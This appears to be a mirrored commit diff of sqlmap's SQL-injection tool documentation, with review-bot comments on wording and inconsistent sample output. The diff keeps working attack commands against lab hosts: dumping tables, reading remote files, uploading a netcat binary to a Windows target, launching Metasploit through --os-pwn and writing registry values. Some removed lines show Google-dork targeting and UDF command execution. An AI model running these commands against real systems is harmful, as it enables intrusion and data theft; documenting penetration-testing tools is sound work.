mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 01:26:42 +03:00
More adjustments
This commit is contained in:
parent
021fce5601
commit
50ba0fa955
108
doc/README.html
|
@ -361,7 +361,7 @@ list of specific parameter(s) to test.
|
|||
requests (multi-threading)</B> to speed up the blind SQL injection
|
||||
techniques. Vice versa, it is also possible to specify the number of
|
||||
seconds to hold between each HTTP(S) request. Others optimization switches
|
||||
to speed up the exploitation are implemented as well.
|
||||
to speed up the exploitation are implemented too.
|
||||
</LI>
|
||||
<LI><B>HTTP <CODE>Cookie</CODE> header</B> string support, useful when the
|
||||
web application requires authentication based upon cookies and you have
|
||||
|
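Review bot: the context line directly above the changed one still reads "Others optimization switches"; since this sentence is being edited anyway, correct it to "Other optimization switches". The swap of "as well" for "too" is neutral on its own; either reads fine at the end of that sentence.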
@ -1132,33 +1132,6 @@ first 100 results for the Google dork expression with <CODE>GET</CODE>
|
|||
parameters asking you if you want to test and inject on each possible
|
||||
affected URL.</P>
|
||||
|
||||
<P>Example of Google dorking with expression <CODE>site:yourdomain.com
|
||||
ext:php</CODE>:</P>
|
||||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
|
||||
|
||||
[hh:mm:38] [INFO] first request to Google to get the session cookie
|
||||
[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
|
||||
testable hosts
|
||||
[hh:mm:41] [INFO] sqlmap got a total of 59 targets
|
||||
[hh:mm:40] [INFO] url 1:
|
||||
GET http://yourdomain.com/example1.php?foo=12, do you want to test this
|
||||
url? [y/N/q] n
|
||||
[hh:mm:43] [INFO] url 2:
|
||||
GET http://yourdomain.com/example2.php?bar=24, do you want to test this
|
||||
url? [y/N/q] n
|
||||
[hh:mm:42] [INFO] url 3:
|
||||
GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
|
||||
want to test this url? [y/N/q] y
|
||||
[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
|
||||
[...]
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
</P>
|
||||
|
||||
|
||||
<H3>Load options from a configuration INI file</H3>
|
||||
|
||||
<P>Switch: <CODE>-c</CODE></P>
|
||||
|
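Review bot: deleting this block removes the only worked example of the `-g` switch, and with it the one place a reader sees that sqlmap prompts per discovered URL ("do you want to test this url? [y/N/q]") rather than attacking every Google result. If the reason for dropping it is the out-of-sequence timestamps in the sample output (hh:mm:41 followed by hh:mm:40, hh:mm:43 followed by hh:mm:42), fixing those lines is preferable to removing the example; otherwise keep a shortened version showing one prompt answered "n" and one answered "y".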
@ -1403,7 +1376,7 @@ connection timeouts. By default it retries up to <B>three times</B>.</P>
|
|||
<P>Rather than using all hosts parsed from provided logs with switch
|
||||
<CODE>-l</CODE>, you can specify valid Python regular expression to be used
|
||||
for filtering desired ones.</P>
|
||||
<P>Example usage:</P>
|
||||
<P>Example of valid syntax:</P>
|
||||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
|
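Review bot: the retitling is fine, but the context sentence it introduces is missing an article: "you can specify valid Python regular expression" should read "you can specify a valid Python regular expression". The other example lead-ins in this document follow the pattern "Example against a ... target:" or "Example usage:", so consider keeping one consistent form rather than introducing "Example of valid syntax:" for this section only.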
@ -1983,22 +1956,23 @@ database name is not specified, the current database name is used.
|
|||
You can also provide the <CODE>-C</CODE> option to specify the table columns
|
||||
name like the one you provided to be enumerated.</P>
|
||||
|
||||
<P>Example against a MySQL target:</P>
|
||||
<P>Example against a SQLite target:</P>
|
||||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb \
|
||||
-T users -C name
|
||||
[...]
|
||||
Database: testdb
|
||||
Database: SQLite_masterdb
|
||||
Table: users
|
||||
[2 columns]
|
||||
+---------+---------------+
|
||||
| Column | Type |
|
||||
+---------+---------------+
|
||||
| name | varchar(500) |
|
||||
| surname | varchar(1000) |
|
||||
+---------+---------------+
|
||||
[3 columns]
|
||||
+---------+---------+
|
||||
| Column | Type |
|
||||
+---------+---------+
|
||||
| id | INTEGER |
|
||||
| name | TEXT |
|
||||
| surname | TEXT |
|
||||
+---------+---------+
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
</P>
|
||||
|
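Review bot: the new SQLite sample output contradicts the text just above it. The command passes `-C name`, which the preceding paragraph describes as enumerating "the table columns name like the one you provided", yet the output lists three columns including `id`, which does not match "name" (the old MySQL output, `name` and `surname`, was consistent with a LIKE-style filter). The command also passes `-D testdb` while the output reports `Database: SQLite_masterdb`. Either drop `id` from the sample table and remove `-D testdb` for the SQLite case, or drop `-C name` from the command so the three-column listing is what the reader should expect.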
@ -2028,7 +2002,7 @@ database name is used.</P>
|
|||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
|
||||
[...]
|
||||
Database: Firebird_masterdb
|
||||
Table: USERS
|
||||
|
@ -2208,41 +2182,11 @@ sqlmap can also remove them from the database for you.</P>
|
|||
<P>These techniques are detailed in the white paper
|
||||
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
|
||||
|
||||
<P>Example against a PostgreSQL target:</P>
|
||||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
|
||||
|
||||
[...]
|
||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||
back-end DBMS: PostgreSQL
|
||||
|
||||
which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
|
||||
how many user-defined functions do you want to create from the shared library? 1
|
||||
what is the name of the UDF number 1? sys_eval
|
||||
how many input parameters takes UDF 'sys_eval'? (default: 1)
|
||||
what is the data-type of input parameter number 1? (default: text)
|
||||
what is the data-type of the return value? (default: text)
|
||||
do you want to call your injected user-defined functions now? [Y/n/q] y
|
||||
which UDF do you want to call?
|
||||
[1] sys_eval
|
||||
[q] Quit
|
||||
> 1
|
||||
what is the value of the parameter number 1 (data-type: text)? echo test
|
||||
do you want to retrieve the return value of the UDF? [Y/n]
|
||||
return value: 'test'
|
||||
|
||||
do you want to call this or another injected UDF? [Y/n] n
|
||||
do you want to remove UDF 'sys_eval'? [Y/n] y
|
||||
[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
|
||||
be deleted manually
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
</P>
|
||||
<P>Use switch <CODE>-</CODE><CODE>-udf-inject</CODE> and follow the instructions.</P>
|
||||
|
||||
<P>If you want, you can specify the shared library local file system path
|
||||
via command line using <CODE>-</CODE><CODE>-shared-lib</CODE> option.</P>
|
||||
via command line too by using <CODE>-</CODE><CODE>-shared-lib</CODE> option. Vice
|
||||
versa sqlmap will ask you for the path at runtime.</P>
|
||||
|
||||
<P>This feature is available only when the database management system is
|
||||
MySQL or PostgreSQL.</P>
|
||||
|
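Review bot: "Vice versa sqlmap will ask you for the path at runtime" misuses "vice versa"; the intended meaning is "Otherwise, sqlmap will ask you for the path at runtime". "via command line too by using" is also awkward; "on the command line with the --shared-lib option" reads better. Separately, the deleted transcript was the only place this document stated the cleanup limitation shown in its last lines ("[WARNING] remember that UDF shared object files saved on the file system can only be deleted manually"). The surviving sentence "sqlmap can also remove them from the database for you" now reads as a complete cleanup, so that caveat should be restated in the prose.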
@ -2271,7 +2215,7 @@ file:</P>
|
|||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
|
||||
--file-read "C:/example.exe" -v 1
|
||||
|
||||
[...]
|
||||
|
@ -2282,14 +2226,14 @@ back-end DBMS: Microsoft SQL Server 2005
|
|||
|
||||
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
|
||||
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
|
||||
C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
|
||||
C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129/files/C__example.exe'
|
||||
[...]
|
||||
|
||||
$ ls -l output/192.168.136.131/files/C__example.exe
|
||||
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
|
||||
$ ls -l output/192.168.136.129/files/C__example.exe
|
||||
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
|
||||
|
||||
$ file output/192.168.136.131/files/C__example.exe
|
||||
output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
|
||||
$ file output/192.168.136.129/files/C__example.exe
|
||||
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
|
||||
80386 32-bit
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
|
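Review bot: the IP substitution is applied consistently to all four occurrences, but the transcript is still internally inconsistent: the file is reported as saved under '/tmp/sqlmap/output/192.168.136.129/files/' while the following `ls -l` and `file` commands use the relative path 'output/192.168.136.129/files/'. Use one form so the sequence can be replayed as shown.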
@ -2320,7 +2264,7 @@ $ file /tmp/nc.exe.packed
|
|||
$ ls -l /tmp/nc.exe.packed
|
||||
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
|
||||
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
|
||||
"/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
|
||||
|
||||
[...]
|
||||
|
@ -2483,7 +2427,7 @@ slide deck
|
|||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int_51.aspx?id=1" \
|
||||
--os-pwn -v 1 --msf-path /tmp/metasploit
|
||||
|
||||
[...]
|
||||
|
@ -2552,7 +2496,7 @@ provided key, with <CODE>-</CODE><CODE>-reg-data</CODE> value data, while with
|
|||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
|
||||
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
|
||||
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
|
|
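Review bot: the `-u` argument in this command is the only one in the file left unquoted (`-u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1`); `?` is a shell glob character, so quote the URL as the other examples do. The double quotes around the `--reg-key` value are right to keep, since the value contains backslashes.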
BIN
doc/README.pdf
Binary file not shown.
101
doc/README.sgml
|
@ -1053,31 +1053,6 @@ first 100 results for the Google dork expression with <tt>GET</tt>
|
|||
parameters asking you if you want to test and inject on each possible
|
||||
affected URL.
|
||||
|
||||
<p>
|
||||
Example of Google dorking with expression <tt>site:yourdomain.com
|
||||
ext:php</tt>:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
|
||||
|
||||
[hh:mm:38] [INFO] first request to Google to get the session cookie
|
||||
[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
|
||||
testable hosts
|
||||
[hh:mm:41] [INFO] sqlmap got a total of 59 targets
|
||||
[hh:mm:40] [INFO] url 1:
|
||||
GET http://yourdomain.com/example1.php?foo=12, do you want to test this
|
||||
url? [y/N/q] n
|
||||
[hh:mm:43] [INFO] url 2:
|
||||
GET http://yourdomain.com/example2.php?bar=24, do you want to test this
|
||||
url? [y/N/q] n
|
||||
[hh:mm:42] [INFO] url 3:
|
||||
GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
|
||||
want to test this url? [y/N/q] y
|
||||
[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
|
||||
[...]
|
||||
</verb></tscreen>
|
||||
|
||||
|
||||
<sect2>Load options from a configuration INI file
|
||||
|
||||
<p>
|
||||
|
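Review bot: this removes the `-g` walkthrough from the SGML source as well, leaving the switch described in prose only. The example carried the user-facing detail that matters, namely that sqlmap asks "[y/N/q]" for each discovered URL instead of testing all of them; a two-URL version of the transcript would preserve that. If the out-of-order timestamps in the sample (hh:mm:41 before hh:mm:40) prompted the removal, correcting them is the smaller change.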
@ -1355,7 +1330,7 @@ Rather than using all hosts parsed from provided logs with switch
|
|||
<tt>-l</tt>, you can specify valid Python regular expression to be used
|
||||
for filtering desired ones.
|
||||
|
||||
Example usage:
|
||||
Example of valid syntax:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
|
||||
|
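Review bot: the `--scope` example regex `(www)?\.target\.(com|net|org)` has two problems worth fixing while this block is being edited. It is unanchored, so any host whose name merely contains ".target.com" passes the filter, and `(www)?\.` requires a leading dot even when "www" is absent, so the bare host "target.com" does not match at all. `^(www\.)?target\.(com|net|org)$` expresses the evident intent. The context sentence also needs an article: "a valid Python regular expression".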
@ -2019,21 +1994,22 @@ You can also provide the <tt>-C</tt> option to specify the table columns
|
|||
name like the one you provided to be enumerated.
|
||||
|
||||
<p>
|
||||
Example against a MySQL target:
|
||||
Example against a SQLite target:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb \
|
||||
-T users -C name
|
||||
[...]
|
||||
Database: testdb
|
||||
Database: SQLite_masterdb
|
||||
Table: users
|
||||
[2 columns]
|
||||
+---------+---------------+
|
||||
| Column | Type |
|
||||
+---------+---------------+
|
||||
| name | varchar(500) |
|
||||
| surname | varchar(1000) |
|
||||
+---------+---------------+
|
||||
[3 columns]
|
||||
+---------+---------+
|
||||
| Column | Type |
|
||||
+---------+---------+
|
||||
| id | INTEGER |
|
||||
| name | TEXT |
|
||||
| surname | TEXT |
|
||||
+---------+---------+
|
||||
</verb></tscreen>
|
||||
|
||||
<p>
|
||||
|
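Review bot: as in the README.html hunk for this section, the SQLite output lists `id` although the command filters with `-C name`, and `-D testdb` is passed while the output shows `Database: SQLite_masterdb`. Since the two files render the same example, fix both together: either omit `id` from the sample table or drop `-C name` from the command, and remove `-D testdb` for the SQLite case.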
@ -2065,7 +2041,7 @@ database name is used.
|
|||
Example against a Firebird target:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
|
||||
[...]
|
||||
Database: Firebird_masterdb
|
||||
Table: USERS
|
||||
|
@ -2267,39 +2243,12 @@ These techniques are detailed in the white paper
|
|||
name="Advanced SQL injection to operating system full control">.
|
||||
|
||||
<p>
|
||||
Example against a PostgreSQL target:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
|
||||
|
||||
[...]
|
||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||
back-end DBMS: PostgreSQL
|
||||
|
||||
which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
|
||||
how many user-defined functions do you want to create from the shared library? 1
|
||||
what is the name of the UDF number 1? sys_eval
|
||||
how many input parameters takes UDF 'sys_eval'? (default: 1)
|
||||
what is the data-type of input parameter number 1? (default: text)
|
||||
what is the data-type of the return value? (default: text)
|
||||
do you want to call your injected user-defined functions now? [Y/n/q] y
|
||||
which UDF do you want to call?
|
||||
[1] sys_eval
|
||||
[q] Quit
|
||||
> 1
|
||||
what is the value of the parameter number 1 (data-type: text)? echo test
|
||||
do you want to retrieve the return value of the UDF? [Y/n]
|
||||
return value: 'test'
|
||||
|
||||
do you want to call this or another injected UDF? [Y/n] n
|
||||
do you want to remove UDF 'sys_eval'? [Y/n] y
|
||||
[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
|
||||
be deleted manually
|
||||
</verb></tscreen>
|
||||
Use switch <tt>-</tt><tt>-udf-inject</tt> and follow the instructions.
|
||||
|
||||
<p>
|
||||
If you want, you can specify the shared library local file system path
|
||||
via command line using <tt>-</tt><tt>-shared-lib</tt> option.
|
||||
via command line too by using <tt>-</tt><tt>-shared-lib</tt> option. Vice
|
||||
versa sqlmap will ask you for the path at runtime.
|
||||
|
||||
<p>
|
||||
This feature is available only when the database management system is
|
||||
|
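Review bot: "Vice versa" should be "Otherwise" here too, and "via command line too by using" should be tightened to "on the command line with". The removed transcript also documented what `--udf-inject` asks interactively (shared library path, number of UDFs, each UDF's name, parameter types and return type, whether to call and whether to remove it), which the remaining instruction "follow the instructions" no longer conveys; a one-sentence list of those prompts would keep the section usable without the full transcript.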
@ -2332,7 +2281,7 @@ Example against a Microsoft SQL Server 2005 target to retrieve a binary
|
|||
file:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
|
||||
--file-read "C:/example.exe" -v 1
|
||||
|
||||
[...]
|
||||
|
@ -2343,14 +2292,14 @@ back-end DBMS: Microsoft SQL Server 2005
|
|||
|
||||
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
|
||||
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
|
||||
C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
|
||||
C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129/files/C__example.exe'
|
||||
[...]
|
||||
|
||||
$ ls -l output/192.168.136.131/files/C__example.exe
|
||||
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
|
||||
$ ls -l output/192.168.136.129/files/C__example.exe
|
||||
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
|
||||
|
||||
$ file output/192.168.136.131/files/C__example.exe
|
||||
output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
|
||||
$ file output/192.168.136.129/files/C__example.exe
|
||||
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
|
||||
80386 32-bit
|
||||
</verb></tscreen>
|
||||
|
||||
|
@ -2383,7 +2332,7 @@ $ file /tmp/nc.exe.packed
|
|||
$ ls -l /tmp/nc.exe.packed
|
||||
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
|
||||
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
|
||||
"/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
|
||||
|
||||
[...]
|
||||
|
@ -2554,7 +2503,7 @@ name="Expanding the control over the operating system from the database">.
|
|||
Example against a MySQL target:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int_51.aspx?id=1" \
|
||||
--os-pwn -v 1 --msf-path /tmp/metasploit
|
||||
|
||||
[...]
|
||||
|
@ -2634,7 +2583,7 @@ provided key, with <tt>-</tt><tt>-reg-data</tt> value data, while with
|
|||
A sample command line for adding a registry key hive follows:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
|
||||
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
|
||||
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
|
||||
</verb></tscreen>
|
||||
|
||||
|
|
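Review bot: quote the `-u` URL as the other examples in this file do. The lead-in context line also says "adding a registry key hive", but the command adds a value (`--reg-value=Test --reg-type=REG_SZ --reg-data=1`) under the key `HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap`; "registry key value" is the accurate term, since hives are the top-level roots such as HKEY_LOCAL_MACHINE.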